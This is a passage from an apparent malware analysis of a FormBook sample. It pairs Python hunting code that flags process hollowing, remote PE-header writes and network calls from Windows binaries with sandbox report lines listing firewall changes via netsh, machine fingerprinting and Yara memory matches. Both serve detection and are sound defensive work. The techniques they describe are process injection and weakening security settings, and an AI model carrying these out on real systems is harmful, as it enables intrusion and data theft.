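            graph[(e.source, e.target)].add(e.kind)
    return {k: sorted(v) for k, v in graph.items()}


def hollowed_hosts(events):
    """Targets unmapped and then mapped by the same source: the hollowing signature."""
    return sorted({t for (s, t), kinds in injection_graph(events).items()
                   if "unmap" in kinds and "map" in kinds})


def pe_header_writes(events):
    """Targets that had an MZ header (4D5A) written into them remotely."""
    return sorted({e.target for e in events if e.kind == "write" and "4D5A" in e.detail})


def system_process_network(events, system_root="C:\\Windows\\"):
    """DNS and connects issued by an image under the Windows directory."""
    return [(e.source, e.kind, e.target) for e in events if e.kind in ("connect", "dns")
            and e.source.lower().startswith(system_root.lower())]


if __name__ == "__main__":
    print(" -> ".join(reversed(ancestry(EVENTS, CMD))))
    for (src, dst), kinds in injection_graph(EVENTS).items():
        print(f"{src} => {dst}: {', '.join(kinds)}")
    print("hollowed:", hollowed_hosts(EVENTS), "network:", system_process_network(EVENTS))
```

The graph makes the hunting signal explicit: a user-writable image (AppData) as the source of alloc/write/map into a Windows-directory image, a Windows-directory image with its original section unmapped, and network activity originating from explorer.exe, which has no business resolving www.anandsharmah.com on its own.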

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Queries volume information: C:\Users\user\AppData\Roaming\princedan85671.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 6.2.princedan85671.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.princedan85671.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2345133773.0000000000260000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2223580519.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2182627662.0000000003596000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2182570687.00000000034FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2344959311.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2223311731.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2223524102.00000000002D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2344652337.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2182506194.0000000003459000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 6.2.princedan85671.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.princedan85671.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2345133773.0000000000260000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2223580519.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2182627662.0000000003596000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2182570687.00000000034FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2344959311.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2223311731.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2223524102.00000000002D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2344652337.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2182506194.0000000003459000.00000004.00000001.sdmp, type: MEMORY